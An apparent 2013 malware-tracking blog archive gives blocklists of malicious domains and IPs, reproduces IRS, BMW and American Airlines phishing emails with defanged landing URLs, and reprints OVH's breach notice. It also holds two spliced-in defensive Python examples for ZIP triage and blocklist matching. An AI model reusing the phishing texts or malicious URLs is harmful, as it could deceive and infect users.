
Tuesday, 23 July 2013

Something evil on 91.233.244.102

The following domains are hosted on 91.233.244.102 (Olborg Ltd, Russia). This IP is implicated in Runforestrun infectors, has several malware detections on VirusTotal plus a few on URLquery, and Google has flagged several of the domains as malicious (marked in red below).

Obviously there's quite a concentration of evil on this IP address, and the simplest thing to do would be to banish it from your network; in fact I would personally recommend blocking the whole 91.233.244.0/23 block, or at least 91.233.244.96/28 (see why). A (probably incomplete) list of suspect domains on this IP is as follows:


aabgxpqayus.com
adcjhjpalcljihgw.info
adwwlwgfgefmzcwg.info
aefbydtsxloe.org
anzku-bqe.net
aodpcm-foub.com
aodpcm-foubfkmp.info
aoflkpshxeoa.org
apsnxeyafofkqfql.ru
apvvkrodqlouyoso.ru
aydpgzxzyidbeqoq.ru
ayxksipvqfxvlfaq.ru
bhigmqckbqhleqlo.ru
cqfreoz-qwd.info
cqfreoz-qwdhmor.com
cuojshtbohnt.com
cuojshtbohnt.info
dfglsfvdyus.com
dgjrfwiwpgjrwdcg.info
dgmcaaliawgewghp.info
donotwantyou787.ru
dppukpdhxloa.org
drgsfp-irxei.com
dspukpshxeoa.org
dwofvs-jdoyhpe.in
eaxrm-xnesh.org
fafogzpvzbvorqkk.ru
fexwxvogrgvfqxzk.ru
feyvxryisqafrssy.ru
fiwiziccefirihhh.info
fjzgpahrgwrzcwle.info
ftiuhrc-tzgk.info
fwcfpfwggjgmfwhw.info
fwdgffzethwhgffp.info
fyqhxu-lfq.in
gffqihioodwfteii.info
ggprgzwfapwdwold.info
gooogleadsense.org
hccakpdhxloa.org
hcnvidjkpytou.com
hhmsobscuoxgqwkhtugpnr.com
hivqwbnkasisil.com
hmcakpshxeoa.org
igicpiipggljcwaf.info
ihwwwhwipfarwrtf.info
ijxsncuprepwqzlt.ru
iprdjrhfporqpgcg.info
ipwfwtdwgiwwehie.info
jdiiffgfgg.com
jecvydtsxloe.org
jeuvkpdhxloa.org
jyuvkpshxeoa.org
kdvmczv-k.in
kkagkpshxeoa.org
kkyqexfzsqzysrkl.ru
knuidyekzkyuhtpi.ru
kxpgydtsxloe.org
kynzmwh-y.info
kynzmwh-yelpu.com
lalcjrdwrqwgwerf.info
ljfwwtftwgiltwwp.info
ljhfhwgiwiwhpwrf.info
lomxtgmgrswlgrrn.ru
mapbo-jra.com
mapbo-jragnrw.info
mfgqnlbmyus.com
mpmeezpmowrgihzc.info
nealkpdhxloa.org
newlydtsxloe.org
nsjosicxuhpidhlp.ru
nwalkpshxeoa.org
ocunydtsxloe.org
ocurkpdhxloa.org
odzbgxfiipvkrqfa.ru
oghwrfhoyus.com
oiicmtkpkaocnm.com
peawrwfgtewchzjc.info
peijgfhwhoffgorf.info
powwrwllojfjgrfg.info
pqueaafqaeoqrqxq.ru
psknwsqsqognrpoo.ru
qablspvqyus.com
qflqqfqqwzazqzrw.ru
qqzewquorqiuqviv.ru
r5z7yy68.com
rfffnahfiywyd.com
rfffnahfiywyd.info
rgdgkpshxeoa.org
rpdgkpdhxloa.org
rpdtydtsxloe.org
rrilffoowjcrqpdw.info
rrrmpfqrgfgfmthj.info
rseibvaoopvkvxyp.ru
sdfsfjkhewsdfe.com
sodsvsyxfzelkknq.ru
soopqzxleaqlqqfi.ru
sownoyqkaqxpqqkp.ru
thwiv-qyhnuydf.info
twctqwaggdwfwhzd.info
uivh-cltqmhb.org
uquqlyyuivkogxyr.ru
vbkfrqqfovaqyeio.ru
viqtkpshxeoa.org
vjykxh-ajp.info
vjykxh-ajpwafh.com
vogxnkg-vgqz.in
vpftydtsxloe.org
vvteeuevhpbpepfi.ru
vxvhwcixcxqxd.com
walfyqoslwfzgxxf.ru
wcrcwwzwercejjjp.info
wfcwhhrfoacawllf.info
wfigeegwffwgoffj.info
wgfdwfhejieeppeo.info
wiafokpwyus.com
wqllweihhwawzctg.info
wwfcfpmfwpompwow.info
xlamzju-lr.com
xlamzju-lrychj.info
xloeydtsxloe.org
xwaqllqvdovqikyn.ru
xweexxdyiaoaskfy.ru
yalkzsvudybexfgd.ru
yirxzxffiedeqddo.ru
ylaqdsoorlrrfyke.ru
ylbaugjnfutivfupbojcybabmrax.com
ypfuidx-i.com
yqgeqwxyfqowoiko.ru
yrjaq-jeyjtckzn.in
zkafwwiilgszbeps.ru
zkzuqobzowqyuixg.ru
zvswwossogquwrfs.ru
zyvskwylixxfswkq.ru

Malware sites to block 23/7/13

These malicious domains and IPs are associated with this prolific gang. As usual, I've listed IPs with hosts first and then a plain list of IPs and domains for copy-and-pasting at the end.

5.175.191.106 (GHOSTnet, Germany)
24.173.170.230 (Time Warner Cable, US)
31.145.19.17 (Borusan Telekom / Ericsson-NET, Turkey)
41.196.17.252 (Link Egypt, Egypt)
46.246.41.68 (Portlane Networks, Sweden)
46.45.182.27 (Radore Veri Merkezi Hizmetleri, Turkey)
50.97.253.162 (Softlayer, US)
54.225.124.116 (Amazon AWS, US)
59.77.36.225 (CERNET, China)
59.124.33.215 (Chungwa Telecom, Taiwan)
59.126.142.186 (Chungwa Telecom, Taiwan)
59.160.69.74 (TATA Communications, India)
61.28.143.133 (ETPI, Philippines)
62.76.44.105 (IT House / Clodo-Cloud, Russia)
69.60.115.92 (Colopronto, US)
74.62.189.22 (Time Warner Cable, US)
74.93.56.83 (Comcast, US)
74.208.246.145 (1&1, US)
85.17.224.131 (Leaseweb, Netherlands)
85.119.187.145 (UniWeb, Belgium)
88.86.100.2 (Supernetwork / Castlegem, Czech Republic)
88.150.191.194 (Redstation, UK)
95.87.1.19 (Trakia Kabel OOD, Bulgaria)
95.111.32.249 (Mobitel EAD, Bulgaria)
108.170.32.179 (Secured Servers, US)
108.179.8.103 (Tyco / Cablevision, US)
109.123.125.68 (UK2.net, UK)
114.112.172.34 (Worldcom Teda Networks Technology, China)
119.92.209.120 (Makati IPG, Philippines)
120.124.132.123 (TANET, Taiwan)
121.83.197.179 (K-Opticom Corporation, Japan)
128.252.158.57 (Washington University, US)
138.80.14.27 (Charles Darwin University, Australia)
140.120.113.18 (TANET, Taiwan)
162.209.80.221 (Rackspace, US)
165.225.149.235 (Joyent, US)
166.78.183.28 (Rackspace, US)
172.245.16.47 (New Wave NetConnect / ColoCrossing, US)
172.255.106.126 (Nobis Technology Group, US)
182.72.216.173 (CusDelight Consultancy Services, India)
188.40.92.12 (Hetzner, Germany)
188.132.213.115 (Mars Global Datacenter Services, Turkey)
188.134.26.172 (Perspectiva Ltd, Russia)
189.15.96.61 (Companhia De Telecomunicacoes Do Brasil Central, Brazil)
190.85.249.159 (Telmex Colombia, Colombia)
190.238.107.240 (Telefonica del Peru, Peru)
192.95.54.119 (OVH, Canada)
192.241.205.26 (Digital Ocean, US)
195.225.58.122 (C&A Connect SRL, Romania)
198.61.213.12 (Rackspace, US)
198.98.102.165 (Enzu, US)
198.175.124.17 (DNSSLAVE.COM, US)
202.197.127.42 (Hunan Normal University, China)
203.236.232.42 (KINX, Korea)
208.69.42.50 (Bay Area Video Coalition, US)
208.115.114.68 (WOWRACK, US)
209.222.67.251 (Razor Inc, US)
210.200.0.95 (Asia Pacific On-line Services, Taiwan)
211.224.204.141 (KINX, Korea)
212.143.233.159 (013 Netvision Network, Israel)
217.64.107.108 (Society Of Mali's Telecommunications, Mali)

5.175.191.106
24.173.170.230
31.145.19.17
41.196.17.252
46.246.41.68
46.45.182.27
50.97.253.162
54.225.124.116
59.77.36.225
59.124.33.215
59.126.142.186
59.160.69.74
61.28.143.133
62.76.44.105
69.60.115.92
74.62.189.22
74.93.56.83
74.208.246.145
85.17.224.131
85.119.187.145
88.86.100.2
88.150.191.194
95.87.1.19
95.111.32.249
108.170.32.179
108.179.8.103
109.123.125.68
114.112.172.34
119.92.209.120
120.124.132.123
121.83.197.179
128.252.158.57
138.80.14.27
140.120.113.18
162.209.80.221
165.225.149.235
166.78.183.28
172.245.16.47
172.255.106.126
182.72.216.173
188.40.92.12
188.132.213.115
188.134.26.172
189.15.96.61
190.85.249.159
190.238.107.240
192.95.54.119
192.241.205.26
195.225.58.122
198.61.213.12
198.98.102.165
198.175.124.17
202.197.127.42
203.236.232.42
208.69.42.50
208.115.114.68
209.222.67.251
210.200.0.95
211.224.204.141
212.143.233.159
217.64.107.108
aa.com.reservation.viewfareruledetailsaccess.do.sai-uka-sai.com
abundanceguys.net
allgstat.ru
amimeseason.net
annot.pl
antidoctorpj.com
aqua-thermos.com
astarts.ru
auditbodies.net
aurakeep.net
autocompletiondel.net
autorize.net.models-and-kits.net
badstylecorps.com
basedbreakpark.su
beachfiretald.com
bebomsn.net
biati.net
blacklistsvignet.pl
blackragnarok.net
blindsay-law.net
bnamecorni.com
boats-sale.net
brasilmatics.net
buffalonyroofers.net
businessdocu.net
buty24-cool.com
buycushion.net
cbstechcorp.net
centow.ru
chairsantique.net
ciriengrozniyivdd.ru
cirormdnivneinted40.ru
clik-kids.com
condaleunvjdlp55.net
condalinarad72234652.ru
condalinaradushko5.ru
condalininneuwu36.net
condalinneuwu37.net
condalinneuwu5.ru
condalnua745746.ru
cooldeaflympics.com
cpa.state.tx.us.tax-returns.mattwaltererie.net
crossplatformcons.com
cryoroyal.net
datapadsinthi.net
doorandstoned.com
driversupdate.pw
dulethcentury.net
e-citystores.net
e-eleves.net
ehchernomorskihu.ru
ehnaisnwhgiuh29.net
ehnihenransivuennd.net
ehnihjrkenpj.ru
ehnihujasebejav15.ru
eliroots.ru
epackage.ups.com.shanghaiherald.net
ergopets.com
erminwanbuernantion20.net
ermitirationifyouwau30.net
estateandpropertty.com
etiquetteinsp.net
fastfragcheck.com
feminineperceiv.pl
fenvid.com
filmstripstyl.com
firefoxupd.pw
firerice.com
flashedglobetrot.pl
foremostorgand.su
foremostorgand.suc
fulty.net
gamnnbienwndd70.net
gcoordinatind.com
gebelikokulu.net
generationpasswaua40.net
genie-enterprises.com
germany.no-ip.biz
ghroumingoviede.ru
gnanosnugivnehu.ru
gondamtvibnejnepl.net
goodread.pl
greenleaf-investment.net
gromovieotvodidiejj40.net
handwrittenma.com
hdmltextvoice.net
heavygear.net
heidipinks.com
hemorelief.net
hiddenhacks.com
highsecure155.com
hingpressplay.net
homesforsaleftwaltonbea.com
hotkoyou.net
hotpubblici.com
housesales.pl
iberiti.com
icensol.net
independinsy.net
info-for-health.net
insectiore.net
irs.gov.tax-refunds.ach.treehouse-dreams.net
jonkrut.ru
kistrotilewest.su
klermont.net
klwines.com.order.complete.prysmm.net
kubiwaya.net
ledfordlawoffice.net
letsgofit.net
linguaape.net
linkedin.com-update-report.taltondark.net
links.emails.bmwusa.com.open.pagebuoy.net
locavoresfood.net
mackay-revealed.net
made-bali.net
magiklovsterd.net
marriott.com.reservation.lookup.motobrio.net
marriott.com.reservation.lookup.viperlair.net
metalcrew.net
microsoftnotification.net
mifiesta.ru
modshows.net
momotlawfirm.net
morphed.ru
mosher.pl
motobrio.net
mycanoweb.com
myfreecamgirls.net
mywebsitetips.net
neplohsec.com
nipslippage.net
nvufvwieg.com
onemessage.verizonwireless.com.verizonwirelessreports.com
ontria.ru
organizerrescui.pl
outbounduk.net
oydahrenlitu346357.ru
package.ups.com.shanghaiherald.net
pagebuoy.net
pass-hc.com
peertag.com
playtimepixelating.su
pool-inter.com
porschetr-ml.com
potteryconvention.ru
privat-tor-service.com
prothericsplk.com
prysmm.net
quipbox.com
ratenames.net
relectsdispla.net
rentipod.ru
restless.su
saberig.net
safebrowse.pw
sai-uka-sai.com
sartorilaw.net
scourswarriors.su
secureaction120.com
securednshooki.com
sendkick.com
sensetegej100.com
seodirect-proxy.com
shanghaiherald.net
sludgekeychai.net
soberimages.com
susubaby.net
tagcentriccent.net
tagcentriccent.pl
tax-returns.gov.cpa.state.us.gebelikokulu.net
teakfromafrica.net
techno5room.ru
thegalaxyatwork.com
thosetemperat.net
tor-connect-secure.com
treehouse-dreams.net
tvblips.net
twitter.com.greenleaf-investment.net
u-janusa.net
ukbash.ru
usergateproxy.net
verizonwirelessreports.com
viperlair.net
vip-proxy-to-tor.com
vitans.net
vivendacalangute.net
wic-office.com
wordstudio.pl
wow-included.com
zestrecommend.com

Monday, 22 July 2013

IRS.gov "Complaint Case #488870383295" spam / Complaint_488870383295.zip

This spam contains a malicious attachment, but seems to confuse the roles of the BBB and the IRS.

Date:      Mon, 22 Jul 2013 09:59:08 -0500 [10:59:08 EDT]
From:      "IRS.gov" [fraud.dep@irs.gov]
Subject:      Complaint Case #488870383295

You have received a complaint in regards to your business services.
The complaint was filled by Mr./Mrs. Ulivo DELERME on 07/22/2013/

Case Number: 488870383295

Instructions on how to resolve this complaint as well as a copy of the original complaint are attached to this email.

Disputes involving consumer products and/or services may be arbitrated. Unless they directly relate to the contract that is the basis of this dispute, the following claims will be considered for arbitration only if all parties agree in writing that the arbitrator may consider them: Claims based on product liability; Claims for personal injuries; Claims that have been resolved by a previous court action, arbitration, or written agreement between the parties.

The decision as to whether your dispute or any part of it can be arbitrated rests solely with the IRS.

The IRS offers a binding arbitration service for disputes involving marketplace transactions. Arbitration is a convenient, civilized way to settle disputes quickly and fairly, without the costs associated with other legal options.

2013 Council of IRS, Inc. All Rights Reserved.

Attached to the email is a ZIP file Complaint_488870383295.zip, which in turn contains an executable Complaint_07222013.exe, which is bad news. VirusTotal detection rates are a so-so 14/47.
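A ZIP that unpacks to an .exe is the whole story here, and that can be decided without ever extracting the attachment to disk. The following is an added example of that triage step, not code from the original post: it lists the members of a ZIP held in memory, flags executable extensions and the "MZ" header that marks a Windows PE file (including a PE hiding behind a document extension), refuses to inflate members that claim an unreasonable size, and records a SHA-256 per member for a VirusTotal lookup. The ZIP it inspects is constructed inline as a stand-in with the same member name; it is not the real sample.

```python
import hashlib
import io
import zipfile

# Member names with these extensions have no business in a mailed ZIP.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".jar"}
# Refuse to read members that claim to inflate beyond this (zip-bomb guard).
MAX_MEMBER_BYTES = 50 * 1024 * 1024


def member_extension(name):
    """Last extension of the member's base name, lower-cased ('' if none)."""
    base = name.rsplit("/", 1)[-1]
    return ("." + base.rsplit(".", 1)[-1].lower()) if "." in base else ""


def triage_zip(data):
    """Inspect a ZIP held in memory without writing anything to disk.
    Returns one finding per member: name, size, SHA-256, and the flags that
    make it suspicious (executable extension, PE 'MZ' header, disguised PE)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            finding = {
                "name": info.filename,
                "size": info.file_size,
                "executable_ext": member_extension(info.filename) in EXECUTABLE_EXTS,
                "mz_header": False,
                "sha256": None,
                "oversized": info.file_size > MAX_MEMBER_BYTES,
            }
            if not finding["oversized"]:
                with zf.open(info) as f:
                    content = f.read()
                finding["mz_header"] = content[:2] == b"MZ"
                finding["sha256"] = hashlib.sha256(content).hexdigest()
            # A PE header behind a non-executable extension is a disguise.
            finding["disguised_pe"] = finding["mz_header"] and not finding["executable_ext"]
            findings.append(finding)
    return findings


def verdict(findings):
    """'block' if any member is executable, a PE, or too big to inspect."""
    for f in findings:
        if f["executable_ext"] or f["mz_header"] or f["oversized"]:
            return "block"
    return "allow"


# Constructed stand-in for the attachment: a minimal 'MZ' header followed by
# filler. This is not the real Complaint_07222013.exe.
FAKE_EXE = b"MZ" + b"\x90" * 62 + b"constructed stand-in, not the real sample"


def build_sample_zip():
    """Build an in-memory ZIP shaped like the one described in the post."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Complaint_07222013.exe", FAKE_EXE)
        zf.writestr("readme.txt", b"Instructions on how to resolve this complaint.")
    return buf.getvalue()


if __name__ == "__main__":
    results = triage_zip(build_sample_zip())
    for r in results:
        print(r)
    print(verdict(results))
```

The size check matters at a mail gateway: a member's declared `file_size` is read from the central directory, so the guard runs before any decompression happens.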

ThreatExpert and Comodo CAMAS give a little background information, but in this case the Malwr analysis seems to be the most comprehensive and shows traffic out to the following compromised sites:

prospexleads.com
phonebillssuck.com
moneyinmarketing.com
abbeyevents.co.uk
salsaconfuego.com
fales.info

The second stage has a much lower detection rate of just 2/47. At the moment it is still being analysed.


BMW spam / pagebuoy.net

This convincing-looking BMW spam leads to malware on pagebuoy.net:

Date:      Mon, 22 Jul 2013 13:07:50 -0500 [14:07:50 EDT]
From:      BMW of North America [womanliere75@postmaster.aa-mail.org]
Reply-To:      motherfuckinge926@m.aa-mail.com
Subject:      The BMW 6-Series M Sport Edition, M Universe, and more.


BMW’s 6-Series M Sport Edition     View Online
BMW
A 6 SERIES.
WITH M PANACHE.
Meet the 6-Series M Sport Edition. Available in all 6 series models, the M Sport Edition boasts premium features like M Aerodynamics, LED Adaptive Headlights, an M leather steering wheel, and Nappa Leather sport seats for a ride that’s a 6-Series inside and out.
LEARN MORE
Efficient Dynamics
   
Table of Contents


» BMW M Universe
» BMW Wins Again
» BMW i3 Design
» BMW Superbike
» BMW Collections

    WELCOME TO M’S
NEW HOME.

In the M Universe, your own M photos will become part of a visual timeline spanning all 40 award-winning years of the iconic M brand, from the classic 1972 to the new M6 Gran Coupe. To all you M fans, welcome home.

» ENTER BMW M UNIVERSE

    THE 3 SERIES WINS AGAIN

The BMW 3 Series continues to live up to its hard-earned reputation as the best compact sports sedan in the world. AUTOMOBILE MAGAZINE presented the 3 Series with the coveted 2013 All-Star award, making the number of AUTOMOBILE MAGAZINE awards won by the 3 Series alone over a dozen.

» BUILD YOUR OWN

    LIGHTWEIGHT, AGILE, AND STRONG

The Life Module of BMW i vehicles is a high–strength and lightweight passenger compartment made from carbon fiber reinforced plastic (CFRP). This, along with the use of aluminum, offsets the additional weight of the batteries of an electric car. And by reducing the weight, the number of batteries and the average battery charging time can also be reduced.

» LEARN MORE

    WORLD SUPERBIKE CHAMPIONSHIP UPDATE

Midway through an already successful season, the BMW Motorrad Goldbet SBK Team is getting ready for their next race in Imola, Italy. The team is coming off an impressive first-place finish by rider Marco Melandri in Portimão. Keep up with the latest news and updates from the team on the BMW Motorrad USA Facebook page.

» STAY CONNECTED

    2013 SPORT COLLECTIONS

BMW presents all-new sport collections. Apparel and accessories made from advanced materials with innovative designs so you can perform and look your best.

» LEARN MORE

EXPLORE THE BMW LINEUP



» Lease + Finance Offers    
» Build Your Own

» Test Drive    
» BMW Ultimate Service®

GET THE LATEST
BMW NEWS + UPDATES                

Don’t forget to add bmwusa@emails.bmwusa.com to your Address Book to keep it from skipping your inbox or getting caught in spam filters.
We want your experience with the BMW website to be as smooth and reassuring as driving a BMW. Accordingly, we diligently safeguard your privacy. If you wish to review our Privacy Policy at any time, please click on the link below, or copy and paste it into your Web browser’s location window. http://www.bmwusa.com/about/privacy.html

We’d like to keep you up-to-date on the latest BMW products, news and events via email. If, however, you’d like to stop receiving them, you can unsubscribe at any time.

Please note that we are located at 300 Chestnut Ridge Road, Woodcliff Lake, NJ 07677. ©2013 BMW of North America, LLC. The BMW name, model names and logo are registered trademarks. For more information call 1-800-831-1117 or go to www.bmwusa.com.

The link in the email goes through a legitimate hacked site and ends up on [donotclick]links.emails.bmwusa.com.open.pagebuoy.net/news/bmw-newmodel.php (report here), which is hosted on the same IP addresses as this spam run.

American Airlines spam / sai-uka-sai.com

This fake American Airlines spam leads to malware on www.aa.com.reservation.viewFareRuleDetailsAccess.do.sai-uka-sai.com:

From:     American.Airlines@aa.net
Date:     22 July 2013 17:22
Subject:     AA.com Itinerary Summary On Hold

Dear customer,

Thank you for making your travel arrangements on AA.com! Your requested itinerary is now ON HOLD. Details below.

To ensure that your reservation is not canceled you must complete the purchase of this reservation by clicking the “Purchase” button on this email, or by using the “View/Change Reservations” section on www.aa.com.


 

This reservation is on HOLD until July 22, 2013 11:59 PM CDT (Central Daylight Time) .

Record Locator: LEBBGM             Purchase

 


Passengers

   Isabella  Green
NOTE: This is not a ticket or electronic receipt
Carrier Flight
Number
Departing Arriving Cabin

Booking Code
Seats Meals
City Date & Time City Date & Time

AMERICAN AIRLINES OPERATED BY AMERICAN EAGLE AIRLINES
2879 SPS Wichita Falls July 24, 2013 10:50 AM DFW Dallas/ Fort Worth July 24, 2013 11:43 AM Economy

M
32A  Food For Purchase 

AMERICAN AIRLINES
1795 DFW Dallas/ Fort Worth July 24, 2013 12:35 PM IAH Houston July 24, 2013 01:43 PM Economy

M
23A 

AMERICAN AIRLINES
1690 IAH Houston July 26, 2013 02:20 PM DFW Dallas/ Fort Worth July 26, 2013 03:35 PM Economy

M
20C 

AMERICAN AIRLINES OPERATED BY AMERICAN EAGLE AIRLINES
3294 DFW Dallas/ Fort Worth July 26, 2013 04:20 PM SPS Wichita Falls July 26, 2013 05:10 PM Economy

M
27B  Food For Purchase 
  Fare Summary help
Average Fare per Person - 444.00 USD
Passenger Type Used in Pricing Fare per Person Additional Taxes and Fees per Person Total Price
1  Adult 442.90 USD 34.25 USD 490.95 USD
Total Price 495.49 USD
  Merchandising Summary help
Flight Number Seat Number Seat Price Taxes Total Price
2879 0.00 USD 0.00 USD 0.00 USD
1795 14.00 USD 1.05 USD 15.05 USD
1690 14.00 USD 1.05 USD 15.05 USD
3294 0.00 USD 0.00 USD 0.00 USD
Total Price 30.10 USD
  Purchase
Please note the following:
 • View Fare rules.
 • Fares are only guaranteed up to 24 hours.
 • Additional foreign taxes may apply.
 • Additional fees may also apply for tickets not purchased through AA.com.


This is not the itinerary receipt that is required for identification purposes at the airport check-in. That receipt will be furnished upon purchase of this reservation.

In order to proceed to your gate you must present a government issued photo I.D. and either your boarding pass or a priority verification card at the screening security checkpoint.

If you are not a resident of the U.S., U.K., Canada or select countries in Latin America and the Caribbean, tickets must be purchased at an American Airlines ticketing location/airport, or by calling an American Airlines International Reservations office. Flights booked on carriers other than American Airlines, American Eagle® or AmericanConnection® are on a request basis only.

You've got payment options at AA.com! Make your dream vacation come true with the Fly Now Payment Plan, speed through checkout with PayPal, or use electronic checks to pay directly from your checking account. You can also pay in cash at participating Western Union locations or use a credit/debit card. Available payment options may vary by country.

The link in the email goes through a legitimate hacked site and ends up on a malware landing page at [donotclick]www.aa.com.reservation.viewFareRuleDetailsAccess.do.sai-uka-sai.com/news/american-airlines-hold.php (report here) hosted on the following IPs:


50.97.253.162 (Softlayer, US)
95.111.32.249 (Megalan / Mobitel EAD, Bulgaria)
188.134.26.172 (Perspectiva Ltd, Russia)
209.222.67.251 (Razor Inc, US)

The WHOIS details for that domain are the characteristically fake ones associated with this gang:
        Michael Fenwick freehotjob@yahoo.com
        21 Fredricksburg Court
        State College
        PA
        16803
        US
        Phone: +1.8144411445




Recommended blocklist:
50.97.253.162
95.111.32.249
188.134.26.172
209.222.67.251
aa.com.reservation.viewfareruledetailsaccess.do.sai-uka-sai.com
allgstat.ru
autorize.net.models-and-kits.net
ciriengrozniyivdd.ru
cirormdnivneinted40.ru
clik-kids.com
condalnua745746.ru
cpa.state.tx.us.tax-returns.mattwaltererie.net
driversupdate.pw
ehchernomorskihu.ru
ehnaisnwhgiuh29.net
ehnihenransivuennd.net
ehnihujasebejav15.ru
eliroots.ru
epackage.ups.com.shanghaiherald.net
ergopets.com
erminwanbuernantion20.net
ermitirationifyouwau30.net
estateandpropertty.com
firefoxupd.pw
firerice.com
fulty.net
gamnnbienwndd70.net
gebelikokulu.net
generationpasswaua40.net
gnanosnugivnehu.ru
gondamtvibnejnepl.net
greenleaf-investment.net
housesales.pl
irs.gov.tax-refunds.ach.treehouse-dreams.net
klwines.com.order.complete.prysmm.net
linkedin.com-update-report.taltondark.net
marriott.com.reservation.lookup.motobrio.net
marriott.com.reservation.lookup.viperlair.net
microsoftnotification.net
mifiesta.ru
motobrio.net
mycanoweb.com
onemessage.verizonwireless.com.verizonwirelessreports.com
package.ups.com.shanghaiherald.net
pagebuoy.net
pass-hc.com
privat-tor-service.com
prysmm.net
quipbox.com
rentipod.ru
safebrowse.pw
sai-uka-sai.com
sartorilaw.net
sendkick.com
shanghaiherald.net
taltondark.net
tax-returns.gov.cpa.state.us.gebelikokulu.net
tor-connect-secure.com
treehouse-dreams.net
tvblips.net
twitter.com.greenleaf-investment.net
verizonwirelessreports.com
viperlair.net
vip-proxy-to-tor.com
vitans.net
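The lists on this page are meant to be pasted into a blocklist, and two details of how they are written matter when you match against them: the recommendation at the top to block 91.233.244.96/28 is a range rather than a host, and the gang's landing pages sit under long deceptive hostnames such as aa.com.reservation.viewFareRuleDetailsAccess.do.sai-uka-sai.com, so a match has to be on the registered domain at the end, not on the familiar name at the front. The following is an added example, not code from the original post, of a matcher that loads a copy-and-paste list of mixed IPs, CIDRs and domains and runs it over proxy log lines. The blocklist and the log lines are constructed for the example (a handful of the page's indicators, documentation-range IPs for the benign entries, and a made-up log format of timestamp, client, host, resolved IP); a real deployment would load the full lists and its own log format.

```python
import ipaddress
import re

# Constructed sample blocklist: a few of the IPs and domains listed on this page
# plus the /28 recommended above for the Olborg Ltd range.
BLOCKLIST_TEXT = """\
91.233.244.96/28
188.134.26.172
pagebuoy.net
sai-uka-sai.com
verizonwirelessreports.com
"""


def load_blocklist(text):
    """Split a copy-and-paste list into IP networks and domain names.
    Bare IPs become /32 networks so one membership test covers both."""
    nets, domains = [], set()
    for line in text.splitlines():
        line = line.strip().lower()
        if not line or line.startswith("#"):
            continue
        try:
            nets.append(ipaddress.ip_network(line, strict=False))
        except ValueError:
            domains.add(line.rstrip("."))
    return nets, domains


NETS, DOMAINS = load_blocklist(BLOCKLIST_TEXT)


def match_host(hostname, domains=DOMAINS):
    """Return the blocklisted domain that hostname equals or sits under, or None.
    Matching is label-aligned: 'notpagebuoy.net' does not match 'pagebuoy.net',
    but 'links.emails.bmwusa.com.open.pagebuoy.net' does."""
    labels = hostname.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in domains:
            return candidate
    return None


def match_ip(ip, nets=NETS):
    """Return the blocklisted network containing ip (as a string), or None."""
    addr = ipaddress.ip_address(ip)
    for net in nets:
        if addr in net:
            return str(net)
    return None


# Constructed proxy log lines: timestamp, client, requested host, resolved IP.
SAMPLE_LOG = """\
2013-07-23T10:00:01Z 10.0.0.5 links.emails.bmwusa.com.open.pagebuoy.net 188.134.26.172
2013-07-23T10:00:02Z 10.0.0.7 www.bmwusa.com 203.0.113.10
2013-07-23T10:00:03Z 10.0.0.9 cdn-update.example 91.233.244.102
2013-07-23T10:00:04Z 10.0.0.5 notpagebuoy.net 198.51.100.7
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def scan_log(text):
    """Return one hit per log line whose host or destination IP is blocklisted.
    The domain match is checked first; the IP match catches direct-by-IP
    access and domains the list has not caught up with yet."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, client, host, dst = m.groups()
        reason = None
        d = match_host(host)
        if d:
            reason = "domain:" + d
        else:
            n = match_ip(dst)
            if n:
                reason = "cidr:" + n
        if reason:
            hits.append({"time": ts, "client": client, "host": host, "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Both checks are needed: the www.bmwusa.com line is not blocked even though the spam imitates it, and the cdn-update.example line is blocked purely because it resolved into the recommended /28.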

OVH Hacked

A bad thing to happen, but kudos to OVH for being transparent about this issue:

Hello,

A few days ago, we discovered that the security of our internal network at our offices in Roubaix had been compromised. After internal investigations, it appeared that a hacker was able to obtain access to an email account of one of our system administrators. With this email access, they were able to gain access to the internal VPN of another employee. Then with this VPN access, they were able to compromise the access of one of the system administrators who handles the internal backoffice.

Until then, internal security was based on 2 levels of verification:
- Geographical: required to be in the office or to use the VPN, i.e.: the IP source
- Personal: password

Measures taken following this incident
---------------------------------------

Immediately following this hack, we changed the internal security rules:
- Passwords of all employees were regenerated for all types of access.
- We set up a new VPN in a secure PCI-DSS room with highly restricted access
- Consulting internal emails is now only possible from the office / VPN
- All those who have critical access now have 3 verification levels:
- Ip source
- Password
- Staff's USB security token (YubiKey)


Findings
-------

After our internal investigation, we assume that the hacker exploited the access to achieve two objectives:
- Recover the database of our customers in Europe
- Gain access to the installation server system in Canada

The European customer database includes personal customer information such as: surname, first name, nic, address, city, country, telephone, fax and encrypted password.
The password encryption is "salted" and based on SHA-512, to avoid brute-force attacks. It takes a lot of technical means to recover the password in clear. But it is possible. This is why we advise you to change the password for your user name. An email will be sent today to all our customers explaining these security measures and inviting them to change their password.
No credit card information is stored at OVH. Credit card information was not viewed or copied.

As for the server delivery system in Canada, the risk we have identified is that if the client had not withdrawn our SSH key from the server, the hacker could connect from our system and retrieve the password stored in the .p file. The SSH key is not usable from another server, only from our backoffice in Canada. Therefore, where the client has not removed our SSH key and has not changed their root password, we immediately changed the password of the servers in the BHS DC to eliminate any risk there. An email will be sent today with the new password. The SSH key will be systematically deleted at the end of the server delivery process in both Canada and Europe. If the client needs OVH for support, a new SSH key will need to be reinstalled.

Overall, in the coming months the back office will be under PCI-DSS which will allow us to ensure that the incident related to a specific hack on specific individuals will have no impact on our databases. In short, we were not paranoid enough so now we're switching to a higher level of paranoia. The aim is to guarantee and protect your data in the case of industrial espionage that would target people working at OVH.

We also filed a criminal complaint about this to the judicial authorities. In order not to disrupt the work of investigators, we will not give other details before the final conclusions.

Please accept our sincere apologies for this incident. Thank you for your understanding.

Regards,

Octave 
